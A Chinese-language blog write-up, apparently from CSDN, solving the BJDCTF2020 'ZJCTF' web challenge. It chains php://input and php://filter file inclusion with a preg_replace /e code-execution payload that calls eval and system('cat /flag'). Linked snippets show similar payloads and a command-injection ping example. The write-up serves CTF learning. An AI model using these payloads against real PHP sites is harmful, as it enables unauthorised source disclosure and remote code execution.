记[BJDCTF2020]ZJCTF,不过如此 关于php的正则匹配问题

最新推荐文章于 2024-06-17 22:56:29 发布
最新推荐文章于 2024-06-17 22:56:29 发布
阅读量269 收藏 1
点赞数 2
分类专栏: ctf 文章标签: web ctf php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/112478012
版权

题目一上来就直接放出一段代码,那么话不多说,直接进行代码设计。

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

从这里我们不难看出

  • 需要传入text和file 两个参数
  • text不能为空且需要file_get_contents($text,‘r’)“等于I have a dream”
  • file对flag进行了过滤,因此我们不能直接getflag
  • 源码给出了提示,我们可以对这个next.php想办法。

这里我们以此来解决问题

  • 首先file_get_contents()是从文件中读取数据,但是这里我们是需要从text参数中获取,因此我们需要使用到php的伪协议 php://input
php://input 是个可以访问请求的原始数据的只读流。通过它可以读取没有处理过的POST数据,从而为file_get_contents()提供数据源
  • 直接include(‘next.php’)没有任何有用的回显,因此我们可以利用文件包含漏洞来读取源代码,这里用到了另一个php伪协议php://filter
php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取.
常见的构造方法形如 :
php://filter/read=convert.base64-encode/recource=index.php
该语句会将index.php的源码内容读取并转换成base64编码,配合include()就可以显示在页面上。

总上所述我们可以构造如下payload

POST /?text=php://input&file=PHP://filter/read%3dconvert.base64-encode/resource%3dnext.php HTTP/1.1
Host: ca6d6997-743e-4428-8758-310ee98d80d5.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=175ba1a882d28-0fc3a4b8b8c4e7-4c302372-1fa400-175ba1a882e130
Upgrade-Insecure-Requests: 1
Content-Length: 14
Content-Type: application/x-www-form-urlencoded

I have a dream

成功获得源码的base64转义

>PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K

转义后的源码为

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

又是一个新的代码审计内容,通过分析我们可以知道

  • 该php会遍历所有get出传入的参数并complex(re,str)函数,其中re为出传入的参数名,str为对应的值
  • getFlag函数有执行eval的权限,应该就是我们最终的目标
  • complex返回grep_replace()的结果,而grep_replace()在/e的匹配模式下,会将替换后的字符串作为php代码执行。
  • 因此我们的最终目标就是利用grep_replace()达到执行getFlag函数的目的。

接下来就是对grep_replace()的具体分析

preg_replace('/(' . $re . ')/ei', 'strtolower("\\1")', $str )

简单的介绍一下preg_replace

preg_replace ($pattern ,  $replacement , $subject )
其中  $pattern为正则表达式
         $replacement为替换字符串
         $subject 为要搜索替换的目标字符串或字符串数组
这个函数存在一些奇异的地方,正则表达式$pattern以/e结尾时$replacement的值会被作为php函数执行。
例如执行 preg_replace (‘/test/e’ ,  "phpinfo();" , "test" )
“test”会被替换为phpinfo();并执行。

再来分析一下题目中的表达式

  • 匹配规则和被匹配字符串我们都可以控制
  • 这儿的strtolower("\1")有点特别,通过查阅资料\1表示取出正则匹配后的第一个子匹配中的第一项。

举个例子,


preg_replace('/(\S)(\S)/i','strtolower("\\1")', "123Abc")
// \S表示匹配任何非空白字符,()表示匹配的子串

就会被替换成

strtolower("1")strtolower("3")strtolower("b")

其中大致的处理过程可以分解成这样

  • php对123Abc进行匹配,正则表达式为(\S)(\S),匹配任意2个非空字符
  • 正则首先匹配到的是[’1‘ ,’2‘],然后将其替换成strtolower("\1"),又因为\1会匹配第一个子串,所以strtolower("\1")就变成了strtolower(“1”)
  • 然后重复顺序的进行如上匹配规则执行,就有了上面的最终匹配结果。

回到题目上来,如何让strtolower("")里面的内容当作函数被执行呢?这里有一个知识点
在php中,双引号里面如果包含有变量,php解释器会将其替换为变量解释后的结果;单引号中的变量不会被处理。也就是说我们可以构造一个变量来达到执行命令的目的。
通过{${}}可以构造特殊的变量。

echo "{${phpinfo()}}";
echo "${phpinfo()}";    
注:在5.5及以上版本下,第二种写法也可以生效,实测5.3/5.4会报错

构造上述的变量,phpinfo就会被执行。
感兴趣的可以参考
https://www.cnblogs.com/dhsx/p/4991983.html

知道了这个我们的大概思路就出来了

  • 构造正则表达式匹配字符串
  • 构造字符串调用getFlag()函数
  • cmd传入命令获取flag

那么现在只剩下如何构造正则表达式,通常会使用
.来匹配任意字符串,但是本题目中GET参数中传入的.会被php的安全机制替换成_,导致正则匹配失败。我们可以通过\S来实现匹配。

注:
\S 匹配任意非空白字符(空白字符如回车、换行、分页等 )
. 匹配任意字符但不包含回车换行
* 贪婪模式,匹配任意次的最大长度
( ) 合并整体匹配,并放入内存,可使用\1 \2...依次获取

最终payload

next.php?\S*=${getFlag()}&cmd=system('cat /flag');

这里构造
/next.php?\S*={${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}}
也是可以的,此处用chr()表示字符是因为直接使用‘”符号就导致闭合出现问题。

成功获取flag
在这里插入图片描述

在这里插入图片描述

fly夏天
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2284
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
PHP实现正则匹配所有括号中的内容
10-18
在编程领域,正则表达式(Regular Expression)是一种强大的文本处理工具,用于匹配字符串模式。在PHP中,正则表达式常被用来进行文本搜索和替换。本篇将详细讲解如何使用PHP实现正则匹配所有括号中的内容,特别是...
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2692
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
BUUCTF [BJDCTF2020] ZJCTF不过如此
Senimo
12-10 569
BUUCTF [BJDCTF2020] ZJCTF不过如此 考点: php伪协议读取源码 函数preg_replace()在\e模式下,存在代码执行漏洞 对于传入的非法的$_GET数组参数名,会将其转换成下划线_ 启动环境,给出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I
ctf php正则截断,[BJDCTF2020]ZJCTF不过如此 关于php正则匹配问题
weixin_42099942的博客
03-17 536
题目一上来就直接放出一段代码,那么话不多说,直接进行代码设计。error_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "".file_get_contents($tex...
[BJDCTF2020]ZJCTF不过如此
stantic的博客
04-13 816
get方式传了一个text和file参数,判断text有没有以及text的值要等于Ihaveadream,上面成立就输出text的字符串 file_get_contents(读取的文件,) 函数是用于将文件的内容读入到一个字符串中的首选方法。遇到这个就用php://input, post部分用等号右边的字符串。 然后再过滤file参数,不允许有flag,如果没有就包含file参数,后面还提示next.php 显然在tetx参数中用php://input协议,post中Ihaveadre...
[BJDCTF2020]ZJCTF不过如此1
最新发布
m0_73673698的博客
06-17 1023
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64解码就是next.php的源码了,源码如下。
[BUUCTF][BJDCTF2020]ZJCTF不过如此
cosmoslin的博客
01-24 748
考点 代码审计 命令执行 解题 打开环境 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&
[BJDCTF2020]ZJCTF不过如此 1
shinygod的博客
03-02 497
知识点:伪协议php://input 参考:深入研究preg_replace与代码执行 读源码 file_get_contents()函数打开text参数,以及后面的文件包含函数,用data伪协议和php伪协议传 text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php <?php $id = $_GET['id']; $_SESSION['id'] = $i
[BUUCTF][BJDCTF2020]ZJCTF不过如此1(做题
qq_48597181的博客
04-05 791
作为正则表达式匹配条件的参数名且这个参数值为的"getFlag();参数名:cmd和需要php执行的代码所以构造id=1&\S*={${getFlag()}}&cmd=system('linux命令');PS:\S是什么意思?正则表达式\S匹配非空字符PS: 为什么用{${getFlag()}} 这个写法?会调用phpinfo()函数并试图将结果嵌入到字符串中。而如果使用phpinfo()函数,它不会自动嵌入到字符串中。(我在这试了好久TAT。
关于php正则匹配汉字的方法介绍
12-19
php正则匹配汉字! /^[\x{4e00}-\x{9fa5}]+$/u以上这个正则表达式就是困扰了很多php程序员的匹配汉字的正则表达式大家可能会觉得很简单,实际上不同编码,不同程序语言,都有些细微的出入,稍不注意就得不到正确的...
PHP中preg_match函数正则匹配的字符串长度问题
10-24
主要介绍了PHP中preg_match函数正则匹配的字符串长度问题,如果你也遇到了preg_match正则提取内容时总是空白或提取不到的话,那就可能是遇到了这个问题啦,需要的朋友可以参考下
PHP简单实现正则匹配省市区的方法
10-18
本篇文章将详细讲解如何使用PHP实现一个简单的正则匹配省市区的方法,并探讨相关操作技巧。 首先,我们看给定的正则表达式: ```php preg_match('/(.*?(省|自治区|北京市|天津市))+(.*?(市|自治州|地区|区划|县))+...
PHP花式绕过大全
热门推荐
fly夏天的博客
10-18 1万+
做了这么长的时间的ctf,现在总结一下自己做过的题,录一下各种可能会存在绕过的php函数,持续跟新。 各位大佬可以一起交流♂交流。 1.preg_replace ($pattern , $replacement , $subject ) 其中 $pattern为正则表达式 $replacement为替换字符串 $subject 为要搜索...
[GXYCTF2019]Ping Ping Ping 1
fly夏天的博客
03-24 5398
打开题目,页面显示/?ip= 应该是一个传参的提示。 结合题目的ping。尝试?ip=127.0.0.1 果然是linux的命令执行,尝试执行其他命令 ?ip=127.0.0.1 ;ls 成功执行 目标是flag.php ?ip=127.0.0.1 ;cat flag.php 提示/?ip= fxck your space! 判断目标网站是对空格进行了过滤,我们可以使用一些方...
极客大挑战 2019 Http 1
fly夏天的博客
03-19 3501
复现平台:buuctf ,该题很有意思因此录一下。 打开页面,乍一看以为是一个广告页,目录扫描也没有出现东西。 使用brupsuite抓包 发现有个Secret.php的链接,点击访问。X-Forwarded-For: localhost Syclover 提示访问来源不对,此时我们可以通过Referer头来伪造链接来源。 注:HTTP Referer是header的一部分,...
BUUCTF SQL注入大合集
fly夏天的博客
06-02 2720
SQL水平太菜了,因此专门复现一轮SQL注入再学习一下。 1.强网杯2019随便注 尝试 1 'and '1'='1 成功回显,存在注入点。 但是题目有很强的过滤。 考虑堆叠注入。 由于没有过滤show函数因此可以用其来进行查询一些数据库信息。常见的有 show databases //查询数据库名称 show tables / show tables from db_name //查询(指定数据库)表名 show engines...
xctf_web upload1
fly夏天的博客
09-30 1967
题目一打开就只有上传界面 习惯性的后台扫描一下没有可以页面,看来目标就在这个上传功能上面了。 尝试上传php文件,报错。 这里我尝试传了一个图片马,能成功上传但是菜刀无法执行。 f12检查源码,发现前端有一个js验证,有一个白名单过滤,只允许上传png或jpg文件。 这里我们可以直接前端删除这段js函数。 然后选择上传一个php文件,刷新即可成功上传。 网站直接给出了上传地址...
php 正则匹配 泰语
04-09
PHP正则表达式是一种强大的工具,用于在字符串中进行模式匹配和搜索。它可以用于各种编程任务,包括验证输入、提取数据和替换文本等。 在PHP中,使用preg_match()函数进行正则匹配。下面是一个简单的例子,演示如何...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值